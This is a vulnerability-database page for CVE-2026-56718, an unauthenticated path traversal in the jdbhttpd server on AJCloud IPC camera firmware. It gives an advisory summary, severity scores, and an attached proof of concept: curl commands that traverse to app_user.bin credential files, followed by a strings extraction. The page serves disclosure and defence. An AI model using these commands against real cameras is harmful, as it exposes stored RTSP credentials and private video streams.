jdbhttpd 0.1.0 Path Traversal / File Disclosure
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2026-56718 | 30 Aug 202620:46 | – | circl | |
| CVE-2026-56718 | 30 Aug 202620:13 | – | cve | |
| CVE-2026-56718 AJCloud AJY IPC Firmware Path Traversal via jdbhttpd | 30 Aug 202620:13 | – | cvelist | |
| EUVD-2026-68290 | 30 Aug 202620:13 | – | euvd | |
| CVE-2026-56718 | 4 Sep 202621:57 | – | kitploit | |
| CVE-2026-56718 | 30 Aug 202621:16 | – | nvd | |
| PT-2026-83633 | 30 Aug 202600:00 | – | ptsecurity | |
| CVE-2026-56718 AJCloud AJY IPC Firmware Path Traversal via jdbhttpd | 30 Aug 202620:13 | – | vulnrichment |
# CVE-2026-56718
Unauthenticated path traversal in `jdbhttpd/0.1.0` (AJCloud AJY IPC firmware) allowing remote reading of arbitrary files as root, including cleartext RTSP credentials.
- **CWE:** CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)
- **Severity:** CVSS 4.0 - 8.7 (High)
- **Affected:** AJCloud AJY IPC Firmware < 01.10715.11.37
- **Credits:** Alessandro Ciotti (finder), VulnCheck (coordinator)
## Summary
`jdbhttpd` resolves files from the request URI without preventing `../` traversal outside the web root. An unauthenticated attacker on the network can read arbitrary files as root, recover the stored RTSP credentials, and use them to access the video stream.
## Full writeup
Full analysis: [CVE-2026-56718](https://hellkid.dev/writeups/cve-2026-56718)
## References
- [MITRE CVE record](https://www.cve.org/CVERecord?id=CVE-2026-56718)
- [VulnCheck advisory](https://www.vulncheck.com/advisories/ajcloud-ajy-ipc-firmware-path-traversal-via-jdbhttpd)
--- packet storm attached poc ---
curl --path-as-is \
"http://192.168.1.8/../../../../../../../../../../var/syscfg/config/app_user.bin" \
--output app_user.bin
curl --path-as-is \
"http://192.168.1.8/../../../../../../../../../../var/syscfg/config_default/app_user.bin" \
--output user_default.bin
strings user_default.binData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Sep 2026 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 3.17.5
CVSS 48.7
EPSS0.00583
SSVC